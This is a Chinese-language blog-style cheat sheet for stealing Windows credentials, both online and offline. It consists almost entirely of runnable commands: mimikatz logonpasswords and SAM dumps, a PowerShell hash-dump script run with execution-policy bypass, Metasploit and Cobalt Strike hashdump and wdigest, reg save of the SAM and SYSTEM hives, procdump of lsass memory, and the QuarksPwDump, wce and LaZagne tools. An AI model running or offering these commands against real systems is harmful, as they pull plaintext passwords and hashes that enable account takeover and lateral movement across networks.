前言
感謝一寸一葉師傅提供的思路,才有了這篇文章,對一寸一葉師傅表示衷心感謝
在線抓密碼
1.mimikatz
privilege::debug
token::whoami
token::elevate
lsadump::sam
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
2.ps腳本
使用Get-PassHashes.ps1
powershell -exec bypass Import-Module .\Get-PassHashes.PS1 Get-PassHashes
3.msf
拿到meterpreter的過程省略掉,用smb445端口建立連接即可
run hashdump hashdump post/windows/gather/credentials/domain_hashdump(獲取域hash) use mimikatz wdigest(明文)
4.cs上線
需要主機至少為administrator權限,user權限需提權后再抓
hashdump
wdigest
logonpasswords(明文)
此處我用的powershell上線,上線過程就不贅述
hashdump命令
wdigest命令
logonpasswords命令
離線抓密碼
1.SAM(卷影副本、注冊表)
卷影副本:卷影副本,也稱為快照,是存儲在 Data Protection Manager (DPM) 服務器上的副本的時間點副本。副本是文件服務器上單個卷的受保護共享、文件夾和文件的完整時間點副本。
管理員狀態下執行如下命令
reg save hklm\sam sam.hiv
reg save hklm\system system.hiv
再到mimikatz下執行如下命令
lsadump::sam /sam:sam.hiv /system:system.hiv
2.lsass.exe(注入lsass.exe進程,並從其內存中提取)
執行如下命令:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
在有mimikatz和dmp文件的目錄下運行cmd,執行如下命令
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
注:這兩步都需要為管理員權限,否則會報錯如下
3.手工導出lsass.dmp文件
使用任務管理器導出lsass.dmp文件
步驟同上
其他工具
1.QuarksPwDump
命令如下:
QuarksPwDump.exe –dhl -o hash.txt
2.wce
抓取明文
wce.exe -w
抓取hash
wce.exe -l
3.lazagne.exe
命令如下
lazagne.exe windows
后記
此處還有很多抓hash的高級方法,但是因為技術的原因這里即使實踐也不懂得原理,所以暫時先不深入研究,貼個鏈接給有興趣的師傅們,可以繼續鑽研一下,等到知識儲備足夠時再來研究